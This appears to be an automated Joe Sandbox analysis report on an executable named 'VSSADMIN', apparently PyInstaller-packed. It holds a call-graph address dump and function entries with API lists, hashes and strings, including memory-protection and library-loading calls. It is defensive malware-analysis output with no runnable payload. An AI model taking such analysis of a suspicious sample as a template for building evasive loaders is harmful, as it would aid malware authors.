calls 3 library calls 66846->66948 66848->66591 66849->66591 66850->66579 66851->66581 66852->66584 66853->66589 66854->66589 66855->66591 66856->66591 66857->66591 66859 7ff614c71b30 49 API calls 66858->66859 66860 7ff614c73d80 66859->66860 66860->66763 66862 7ff614c73c6a 66861->66862 66863 7ff614c77a60 57 API calls 66862->66863 66864 7ff614c73c92 66863->66864 66865 7ff614c7adb0 _wfindfirst32i64 8 API calls 66864->66865 66866 7ff614c73cba 66865->66866 66866->66758 66866->66776 66868 7ff614c77a60 57 API calls 66867->66868 66869 7ff614c771f7 LoadLibraryW 66868->66869 66870 7ff614c77214 __std_exception_copy 66869->66870 66870->66772 66871->66760 66872->66766 66873->66765 66874->66760 66875->66760 66877 7ff614c74afa 66876->66877 66881 7ff614c74c13 66877->66881 66885 7ff614c74ce9 66877->66885 66902 7ff614c74cb1 66877->66902 66908 7ff614c85700 47 API calls 66877->66908 66909 7ff614c71780 59 API calls 66877->66909 66878 7ff614c7adb0 _wfindfirst32i64 8 API calls 66879 7ff614c74cd0 66878->66879 66906 7ff614c77c60 59 API calls __std_exception_copy 66879->66906 66881->66902 66910 7ff614c891b4 66881->66910 66920 7ff614c72770 59 API calls 2 library calls 66885->66920 66888 7ff614c74c36 66889 7ff614c891b4 _fread_nolock 37 API calls 66888->66889 66890 7ff614c74c48 66889->66890 66917 7ff614c8580c 39 API calls 3 library calls 66890->66917 66892 7ff614c74c54 66918 7ff614c85d94 73 API calls 66892->66918 66894 7ff614c74c66 66919 7ff614c85d94 73 API calls 66894->66919 66896 7ff614c74c78 66897 7ff614c84f44 71 API calls 66896->66897 66898 7ff614c74c89 66897->66898 66899 7ff614c84f44 71 API calls 66898->66899 66900 7ff614c74c9d 66899->66900 66901 7ff614c84f44 71 API calls 66900->66901 66901->66902 66902->66878 66903->66781 66904->66789 66905->66800 66906->66805 66907->66794 66908->66877 66909->66877 66911 7ff614c891bd 66910->66911 66913 7ff614c74c2a 66910->66913 66921 7ff614c84474 11 API calls _set_fmode 66911->66921 66916 7ff614c8580c 39 API calls 3 library calls 66913->66916 66914 7ff614c891c2 66922 7ff614c89de0 37 API calls _invalid_parameter_noinfo 66914->66922 66916->66888 66917->66892 66918->66894 66919->66896 66920->66902 66921->66914 66923->66811 66924->66816 66925->66816 66926->66820 66928 7ff614c710a6 66927->66928 66929 7ff614c710ad 66928->66929 66930 7ff614c710d3 66928->66930 66953 7ff614c72770 59 API calls 2 library calls 66929->66953 66933 7ff614c710ed 66930->66933 66934 7ff614c71109 66930->66934 66932 7ff614c710c0 66932->66841 66954 7ff614c724d0 59 API calls 3 library calls 66933->66954 66936 7ff614c7111b 66934->66936 66939 7ff614c71137 memcpy_s 66934->66939 66955 7ff614c724d0 59 API calls 3 library calls 66936->66955 66938 7ff614c7f62c _fread_nolock 53 API calls 66938->66939 66939->66938 66940 7ff614c71104 __std_exception_copy 66939->66940 66943 7ff614c711fe 66939->66943 66944 7ff614c7f3a0 37 API calls 66939->66944 66949 7ff614c7fd6c 66939->66949 66940->66841 66956 7ff614c72770 59 API calls 2 library calls 66943->66956 66944->66939 66945->66835 66946->66834 66947->66841 66948->66841 66950 7ff614c7fd9c 66949->66950 66957 7ff614c7fabc 66950->66957 66952 7ff614c7fdba 66952->66939 66953->66932 66954->66940 66955->66940 66956->66940 66958 7ff614c7fadc 66957->66958 66963 7ff614c7fb09 66957->66963 66959 7ff614c7fae6 66958->66959 66960 7ff614c7fb11 66958->66960 66958->66963 66971 7ff614c89d14 37 API calls 2 library calls 66959->66971 66964 7ff614c7f9fc 66960->66964 66963->66952 66972 7ff614c8431c EnterCriticalSection 66964->66972 66966 7ff614c7fa19 66967 7ff614c7fa3c 74 API calls 66966->66967 66968 7ff614c7fa22 66967->66968 66969 7ff614c84328 _fread_nolock LeaveCriticalSection 66968->66969 66970 7ff614c7fa2d 66969->66970 66970->66963 66971->66963 66974 7ff614c729c6 66973->66974 66975 7ff614c71b30 49 API calls 66974->66975 66977 7ff614c729fb 66975->66977 66976 7ff614c72e01 66977->66976 66978 7ff614c73b40 49 API calls 66977->66978 66979 7ff614c72a6f 66978->66979 67031 7ff614c72e20 66979->67031 66982 7ff614c72aea 66984 7ff614c72e20 75 API calls 66982->66984 66983 7ff614c72ab1 67039 7ff614c76740 98 API calls 66983->67039 66986 7ff614c72b3c 66984->66986 66988 7ff614c72ba6 66986->66988 66989 7ff614c72b40 66986->66989 66987 7ff614c72ab9 66990 7ff614c72ada 66987->66990 67040 7ff614c76620 138 API calls 2 library calls 66987->67040 66991 7ff614c72e20 75 API calls 66988->66991 67041 7ff614c76740 98 API calls 66989->67041 66997 7ff614c72ae3 66990->66997 67043 7ff614c72770 59 API calls 2 library calls 66990->67043 66995 7ff614c72bd2 66991->66995 66998 7ff614c72c32 66995->66998 66999 7ff614c72e20 75 API calls 66995->66999 66996 7ff614c72b48 66996->66990 67042 7ff614c76620 138 API calls 2 library calls 66996->67042 67002 7ff614c7adb0 _wfindfirst32i64 8 API calls 66997->67002 66998->66976 67044 7ff614c76740 98 API calls 66998->67044 67003 7ff614c72c02 66999->67003 67005 7ff614c72b9b 67002->67005 67003->66998 67007 7ff614c72e20 75 API calls 67003->67007 67004 7ff614c72b65 67004->66990 67006 7ff614c72de6 67004->67006 67005->66599 67048 7ff614c72770 59 API calls 2 library calls 67006->67048 67007->66998 67008 7ff614c71af0 59 API calls 67010 7ff614c72c9f 67008->67010 67009 7ff614c72c42 67009->66976 67009->67008 67021 7ff614c72d5f 67009->67021 67010->66976 67013 7ff614c71b30 49 API calls 67010->67013 67012 7ff614c72d5a 67049 7ff614c71ab0 74 API calls __std_exception_copy 67012->67049 67015 7ff614c72cc7 67013->67015 67015->67006 67017 7ff614c71b30 49 API calls 67015->67017 67016 7ff614c72dcb 67016->67006 67047 7ff614c71440 161 API calls 2 library calls 67016->67047 67018 7ff614c72cf4 67017->67018 67018->67006 67020 7ff614c71b30 49 API calls 67018->67020 67022 7ff614c72d21 67020->67022 67021->67016 67046 7ff614c71780 59 API calls 67021->67046 67022->67006 67024 7ff614c717b0 121 API calls 67022->67024 67025 7ff614c72d43 67024->67025 67025->67021 67026 7ff614c72d47 67025->67026 67045 7ff614c72770 59 API calls 2 library calls 67026->67045 67028->66599 67029->66594 67030->66599 67032 7ff614c72e54 67031->67032 67050 7ff614c83c14 67032->67050 67035 7ff614c72e8b 67037 7ff614c7adb0 _wfindfirst32i64 8 API calls 67035->67037 67038 7ff614c72aad 67037->67038 67038->66982 67038->66983 67039->66987 67040->66990 67041->66996 67042->67004 67043->66997 67044->67009 67045->67012 67046->67021 67047->67016 67048->67012 67049->66976 67053 7ff614c83c6e 67050->67053 67051 7ff614c83c93 67085 7ff614c89d14 37 API calls 2 library calls 67051->67085 67053->67051 67054 7ff614c83ccf 67053->67054 67086 7ff614c81ea0 49 API calls _invalid_parameter_noinfo 67054->67086 67056 7ff614c83dac 67089 7ff614c89e48 11 API calls 2 library calls 67056->67089 67057 7ff614c83d66 67057->67056 67061 7ff614c83d81 67057->67061 67062 7ff614c83dd0 67057->67062 67065 7ff614c83d78 67057->67065 67058 7ff614c7adb0 _wfindfirst32i64 8 API calls 67060 7ff614c72e7a 67058->67060 67060->67035 67068 7ff614c84e38 67060->67068 67087 7ff614c89e48 11 API calls 2 library calls 67061->67087 67062->67056 67063 7ff614c83dda 67062->67063 67088 7ff614c89e48 11 API calls 2 library calls 67063->67088 67065->67056 67065->67061 67067 7ff614c83cbd 67067->67058 67069 7ff614c84e55 67068->67069 67070 7ff614c84e61 67068->67070 67090 7ff614c846b0 67069->67090 67115 7ff614c84a4c 45 API calls __CxxCallCatchBlock 67070->67115 67073 7ff614c84e5a 67073->67035 67074 7ff614c84e89 67077 7ff614c84e99 67074->67077 67116 7ff614c8dffc 5 API calls __crtLCMapStringW 67074->67116 67117 7ff614c84534 14 API calls 3 library calls 67077->67117 67078 7ff614c84ef1 67079 7ff614c84f09 67078->67079 67080 7ff614c84ef5 67078->67080 67081 7ff614c846b0 69 API calls 67079->67081 67080->67073 67118 7ff614c89e48 11 API calls 2 library calls 67080->67118 67083 7ff614c84f15 67081->67083 67083->67073 67119 7ff614c89e48 11 API calls 2 library calls 67083->67119 67085->67067 67086->67057 67087->67067 67088->67067 67089->67067 67091 7ff614c846ca 67090->67091 67092 7ff614c846e7 67090->67092 67120 7ff614c84454 11 API calls _set_fmode 67091->67120 67092->67091 67093 7ff614c846fa CreateFileW 67092->67093 67096 7ff614c84764 67093->67096 67097 7ff614c8472e 67093->67097 67095 7ff614c846cf 67121 7ff614c84474 11 API calls _set_fmode 67095->67121 67124 7ff614c84d28 46 API calls 3 library calls 67096->67124 67123 7ff614c84804 59 API calls 3 library calls 67097->67123 67101 7ff614c846d7 67122 7ff614c89de0 37 API calls _invalid_parameter_noinfo 67101->67122 67102 7ff614c8473c 67105 7ff614c84759 CloseHandle 67102->67105 67106 7ff614c84743 CloseHandle 67102->67106 67103 7ff614c84769 67107 7ff614c8476d 67103->67107 67108 7ff614c84798 67103->67108 67111 7ff614c846e2 67105->67111 67106->67111 67125 7ff614c843e8 11 API calls 2 library calls 67107->67125 67126 7ff614c84ae8 51 API calls 67108->67126 67111->67073 67112 7ff614c847a5 67127 7ff614c84c24 21 API calls _fread_nolock 67112->67127 67114 7ff614c84777 67114->67111 67115->67074 67116->67077 67117->67078 67118->67073 67119->67073 67120->67095 67121->67101 67123->67102 67124->67103 67125->67114 67126->67112 67127->67114 67128->66609 67133 7ff614c8542c 67130->67133 67131 7ff614c85452 67161 7ff614c84474 11 API calls _set_fmode 67131->67161 67133->67131 67135 7ff614c85485 67133->67135 67134 7ff614c85457 67162 7ff614c89de0 37 API calls _invalid_parameter_noinfo 67134->67162 67137 7ff614c8548b 67135->67137 67138 7ff614c85498 67135->67138 67163 7ff614c84474 11 API calls _set_fmode 67137->67163 67149 7ff614c8a128 67138->67149 67139 7ff614c73d29 67139->66620 67143 7ff614c854ac 67164 7ff614c84474 11 API calls _set_fmode 67143->67164 67144 7ff614c854b9 67156 7ff614c8f4cc 67144->67156 67147 7ff614c854cc 67165 7ff614c84328 LeaveCriticalSection 67147->67165 67166 7ff614c8f7b8 EnterCriticalSection 67149->67166 67151 7ff614c8a13f 67152 7ff614c8a19c 19 API calls 67151->67152 67153 7ff614c8a14a 67152->67153 67154 7ff614c8f818 _isindst LeaveCriticalSection 67153->67154 67155 7ff614c854a2 67154->67155 67155->67143 67155->67144 67167 7ff614c8f1c8 67156->67167 67160 7ff614c8f526 67160->67147 67161->67134 67163->67139 67164->67139 67172 7ff614c8f203 __vcrt_InitializeCriticalSectionEx 67167->67172 67169 7ff614c8f4a1 67186 7ff614c89de0 37 API calls _invalid_parameter_noinfo 67169->67186 67171 7ff614c8f3d3 67171->67160 67179 7ff614c9618c 67171->67179 67177 7ff614c8f3ca 67172->67177 67182 7ff614c954a4 51 API calls 3 library calls 67172->67182 67174 7ff614c8f435 67174->67177 67183 7ff614c954a4 51 API calls 3 library calls 67174->67183 67176 7ff614c8f454 67176->67177 67184 7ff614c954a4 51 API calls 3 library calls 67176->67184 67177->67171 67185 7ff614c84474 11 API calls _set_fmode 67177->67185 67187 7ff614c9578c 67179->67187 67182->67174 67183->67176 67184->67177 67185->67169 67188 7ff614c957c1 67187->67188 67189 7ff614c957a3 67187->67189 67188->67189 67191 7ff614c957dd 67188->67191 67241 7ff614c84474 11 API calls _set_fmode 67189->67241 67198 7ff614c95d9c 67191->67198 67192 7ff614c957a8 67242 7ff614c89de0 37 API calls _invalid_parameter_noinfo 67192->67242 67195 7ff614c957b4 67195->67160 67244 7ff614c95ad0 67198->67244 67201 7ff614c95e11 67276 7ff614c84454 11 API calls _set_fmode 67201->67276 67202 7ff614c95e29 67264 7ff614c86d2c 67202->67264 67221 7ff614c95e16 67277 7ff614c84474 11 API calls _set_fmode 67221->67277 67234 7ff614c95808 67234->67195 67243 7ff614c86d04 LeaveCriticalSection 67234->67243 67241->67192 67245 7ff614c95afc 67244->67245 67246 7ff614c95b16 67244->67246 67245->67246 67289 7ff614c84474 11 API calls _set_fmode 67245->67289 67251 7ff614c95b94 67246->67251 67291 7ff614c84474 11 API calls _set_fmode 67246->67291 67248 7ff614c95b0b 67290 7ff614c89de0 37 API calls _invalid_parameter_noinfo 67248->67290 67250 7ff614c95be5 67261 7ff614c95c42 67250->67261 67295 7ff614c8579c 37 API calls 2 library calls 67250->67295 67251->67250 67293 7ff614c84474 11 API calls _set_fmode 67251->67293 67254 7ff614c95c3e 67259 7ff614c95cc0 67254->67259 67254->67261 67255 7ff614c95bda 67294 7ff614c89de0 37 API calls _invalid_parameter_noinfo 67255->67294 67258 7ff614c95b89 67292 7ff614c89de0 37 API calls _invalid_parameter_noinfo 67258->67292 67296 7ff614c89e00 17 API calls _wfindfirst32i64 67259->67296 67261->67201 67261->67202 67297 7ff614c8f7b8 EnterCriticalSection 67264->67297 67276->67221 67277->67234 67289->67248 67291->67258 67293->67255 67295->67254 67299 7ff614c87998 67298->67299 67302 7ff614c87474 67299->67302 67301 7ff614c879b1 67301->66630 67303 7ff614c8748f 67302->67303 67304 7ff614c874be 67302->67304 67313 7ff614c89d14 37 API calls 2 library calls 67303->67313 67312 7ff614c8431c EnterCriticalSection 67304->67312 67307 7ff614c874c3 67309 7ff614c874e0 38 API calls 67307->67309 67308 7ff614c874af 67308->67301 67310 7ff614c874cf 67309->67310 67311 7ff614c84328 _fread_nolock LeaveCriticalSection 67310->67311 67311->67308 67313->67308 67315 7ff614c7f0d3 67314->67315 67316 7ff614c7f101 67314->67316 67325 7ff614c89d14 37 API calls 2 library calls 67315->67325 67323 7ff614c7f0f3 67316->67323 67324 7ff614c8431c EnterCriticalSection 67316->67324 67319 7ff614c7f118 67320 7ff614c7f134 72 API calls 67319->67320 67321 7ff614c7f124 67320->67321 67322 7ff614c84328 _fread_nolock LeaveCriticalSection 67321->67322 67322->67323 67323->66634 67325->67323 67326 7ff614c88584 67327 7ff614c88594 67326->67327 67328 7ff614c8859d 67326->67328 67327->67328 67332 7ff614c88094 67327->67332 67333 7ff614c880ad 67332->67333 67334 7ff614c880a9 67332->67334 67346 7ff614c91bac GetEnvironmentStringsW 67333->67346 67334->67328 67345 7ff614c88454 12 API calls 3 library calls 67334->67345 67337 7ff614c880ba 67372 7ff614c89e48 11 API calls 2 library calls 67337->67372 67338 7ff614c880c6 67353 7ff614c88214 67338->67353 67343 7ff614c880ed 67374 7ff614c89e48 11 API calls 2 library calls 67343->67374 67345->67328 67347 7ff614c91bd0 67346->67347 67348 7ff614c880b2 67346->67348 67375 7ff614c8cafc 67347->67375 67348->67337 67348->67338 67350 7ff614c91c07 memcpy_s 67382 7ff614c89e48 11 API calls 2 library calls 67350->67382 67352 7ff614c91c27 FreeEnvironmentStringsW 67352->67348 67354 7ff614c8823c 67353->67354 67385 7ff614c8dd70 67354->67385 67356 7ff614c8827f 67392 7ff614c89e48 11 API calls 2 library calls 67356->67392 67358 7ff614c880ce 67373 7ff614c89e48 11 API calls 2 library calls 67358->67373 67359 7ff614c882f9 67397 7ff614c89e48 11 API calls 2 library calls 67359->67397 67361 7ff614c8dd70 _set_fmode 11 API calls 67367 7ff614c88277 67361->67367 67362 7ff614c882e8 67395 7ff614c88330 11 API calls __free_lconv_num 67362->67395 67365 7ff614c882f0 67396 7ff614c89e48 11 API calls 2 library calls 67365->67396 67367->67356 67367->67359 67367->67361 67367->67362 67368 7ff614c8831c 67367->67368 67393 7ff614c8f954 37 API calls 2 library calls 67367->67393 67394 7ff614c89e48 11 API calls 2 library calls 67367->67394 67398 7ff614c89e00 17 API calls _wfindfirst32i64 67368->67398 67372->67334 67373->67343 67374->67334 67376 7ff614c8cb47 67375->67376 67380 7ff614c8cb0b _set_fmode 67375->67380 67384 7ff614c84474 11 API calls _set_fmode 67376->67384 67378 7ff614c8cb2e RtlAllocateHeap 67379 7ff614c8cb45 67378->67379 67378->67380 67379->67350 67380->67376 67380->67378 67383 7ff614c926e0 EnterCriticalSection LeaveCriticalSection _set_fmode 67380->67383 67382->67352 67383->67380 67384->67379 67386 7ff614c8dd81 _set_fmode 67385->67386 67387 7ff614c8ddd2 67386->67387 67388 7ff614c8ddb6 RtlAllocateHeap 67386->67388 67399 7ff614c926e0 EnterCriticalSection LeaveCriticalSection _set_fmode 67386->67399 67400 7ff614c84474 11 API calls _set_fmode 67387->67400 67388->67386 67390 7ff614c8ddd0 67388->67390 67390->67367 67392->67358 67393->67367 67394->67367 67395->67365 67396->67356 67397->67358 67399->67386 67400->67390 67401 7ff614c7a650 67402 7ff614c7a673 67401->67402 67403 7ff614c7a68f memcpy_s 67401->67403 67404 7ff614c8cafc 12 API calls 67402->67404 67404->67403

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00007FF614C95D9C Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 237 7ff614c95d9c-7ff614c95e0f call 7ff614c95ad0 240 7ff614c95e11-7ff614c95e1a call 7ff614c84454 237->240 241 7ff614c95e29-7ff614c95e33 call 7ff614c86d2c 237->241 248 7ff614c95e1d-7ff614c95e24 call 7ff614c84474 240->248 246 7ff614c95e4e-7ff614c95eb7 CreateFileW 241->246 247 7ff614c95e35-7ff614c95e4c call 7ff614c84454 call 7ff614c84474 241->247 250 7ff614c95f34-7ff614c95f3f GetFileType 246->250 251 7ff614c95eb9-7ff614c95ebf 246->251 247->248 259 7ff614c9616a-7ff614c9618a 248->259 254 7ff614c95f41-7ff614c95f7c GetLastError call 7ff614c843e8 CloseHandle 250->254 255 7ff614c95f92-7ff614c95f99 250->255 257 7ff614c95f01-7ff614c95f2f GetLastError call 7ff614c843e8 251->257 258 7ff614c95ec1-7ff614c95ec5 251->258 254->248 271 7ff614c95f82-7ff614c95f8d call 7ff614c84474 254->271 262 7ff614c95fa1-7ff614c95fa4 255->262 263 7ff614c95f9b-7ff614c95f9f 255->263 257->248 258->257 264 7ff614c95ec7-7ff614c95eff CreateFileW 258->264 268 7ff614c95faa-7ff614c95fff call 7ff614c86c44 262->268 269 7ff614c95fa6 262->269 263->268 264->250 264->257 276 7ff614c9601e-7ff614c9604f call 7ff614c95850 268->276 277 7ff614c96001-7ff614c9600d call 7ff614c95cd8 268->277 269->268 271->248 283 7ff614c96051-7ff614c96053 276->283 284 7ff614c96055-7ff614c96097 276->284 277->276 282 7ff614c9600f 277->282 285 7ff614c96011-7ff614c96019 call 7ff614c89fc0 282->285 283->285 286 7ff614c960b9-7ff614c960c4 284->286 287 7ff614c96099-7ff614c9609d 284->287 285->259 290 7ff614c96168 286->290 291 7ff614c960ca-7ff614c960ce 286->291 287->286 289 7ff614c9609f-7ff614c960b4 287->289 289->286 290->259 291->290 293 7ff614c960d4-7ff614c96119 CloseHandle CreateFileW 291->293 294 7ff614c9614e-7ff614c96163 293->294 295 7ff614c9611b-7ff614c96149 GetLastError call 7ff614c843e8 call 7ff614c86e6c 293->295 294->290 295->294
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1617910340-0
                                                                                                                                                                      • Opcode ID: c193deae2c68f2782aecede26064aa5b5da501404692e974333340cb25ef943d
                                                                                                                                                                      • Instruction ID: b68f983b892a7b5db8c62fe9801dbb15b0ac0717b6815dec5b91bd7101bebb8a
                                                                                                                                                                      • Opcode Fuzzy Hash: c193deae2c68f2782aecede26064aa5b5da501404692e974333340cb25ef943d
                                                                                                                                                                      • Instruction Fuzzy Hash: AFC1AD37B28E4295EB10CF68C4D06AC3771EB5AFA8B01523ADA2E97795DF3AD551C300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FF45510 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 850librarymemoryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                      • String ID: v25
                                                                                                                                                                      • API String ID: 3300690313-352214434
                                                                                                                                                                      • Opcode ID: 81e439c2f95b6ff207ce10fa622c9e2eedcd61100e367f92fc92251c239f3918
                                                                                                                                                                      • Instruction ID: 38d6fe9c059d25f0eba26e28a72433fc53c93fcdf728bfa46f544aa6523488d4
                                                                                                                                                                      • Opcode Fuzzy Hash: 81e439c2f95b6ff207ce10fa622c9e2eedcd61100e367f92fc92251c239f3918
                                                                                                                                                                      • Instruction Fuzzy Hash: 2062166272859A86E7199E38D41027D77A0F748785F085632EFAEC37D4EE3CEA49D700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7B1B0 Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 59578552-0
                                                                                                                                                                      • Opcode ID: 2d1ec54d9dc1f814aac4ffc56ccc42f9ec7497739519b971d77b754768042176
                                                                                                                                                                      • Instruction ID: 8589a500f0291bc674069ddf769efa1a77272bf0df5498fe465d48b40ae2e558
                                                                                                                                                                      • Opcode Fuzzy Hash: 2d1ec54d9dc1f814aac4ffc56ccc42f9ec7497739519b971d77b754768042176
                                                                                                                                                                      • Instruction Fuzzy Hash: 6EE0B670E1D94382F61876A95CC30BE10B05F97B30FA0023BE11AC7AD2CD6D2592AA26
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C717B0 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 144COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _fread_nolock$Message_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                                                      • API String ID: 2153230061-4158440160
                                                                                                                                                                      • Opcode ID: e036ff8412cb2c1497607d8fe513f5a54bf87ec72a6f69b8acc9117b6522fd3b
                                                                                                                                                                      • Instruction ID: fc024c6191311fc2d0b1db3c8f92be47550509f0b7b486c87cb3a172f5e39cb1
                                                                                                                                                                      • Opcode Fuzzy Hash: e036ff8412cb2c1497607d8fe513f5a54bf87ec72a6f69b8acc9117b6522fd3b
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A514772A1DE0286EB54CF28D4D127823B1EB8AF69B518137DA0DC3799DE3CE541C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C712B0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 106COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
